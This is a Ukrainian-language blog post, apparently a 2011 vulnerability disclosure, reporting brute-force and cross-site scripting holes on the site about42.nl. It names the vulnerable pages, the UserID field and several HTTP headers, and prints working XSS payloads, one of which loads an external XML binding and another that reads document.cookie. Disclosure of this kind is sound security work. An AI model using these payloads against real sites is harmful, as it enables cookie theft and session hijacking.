Нові уразливості на about42.nl
23:56 22.06.2011У червні, 25.06.2010, а також додатково 17.06.2011, я знайшов Brute Force та Cross-Site Scripting уразливості на проекті http://about42.nl. Про що найближчим часом сповіщу адміністрацію проекту.
Раніше я вже писав про уразливості на about42.nl.
Brute Force:
http://about42.nl/www/showinfo.php
XSS:
POST запит на сторінці http://about42.nl/www/showinfo.php
" style="-moz-binding:url('http://websecurity.com.ua/webtools/xss.xml#xss')
В полі UserID.
GET/POST запит на сторінці http://about42.nl/www/showheaders.php
<script>alert(document.cookie)</script>
В HTTP заголовках: User-Agent, Accept, Accept-Language, Accept-Encoding, Accept-Charset, Referer, а також майже в будь-яких довільних заголовках.
Дані XSS атаки через заголовки можна провести через флеш, про що я писав в статті Відправка серверних заголовків в Flash. Але враховуючи те, що на сайті немає crossdomain.xml, то атака не спрацює в нових версіях флеш-плагіна (тільки в старих версіях), про що я писав у даній статті.
Тому потрібно буде скористатися іншими методами, зокрема для заголовка User-Agent, про що я розповідав в статті XSS атаки через заголовок User-Agent. Деякі з зазначених методів підійдуть і для інших заголовків.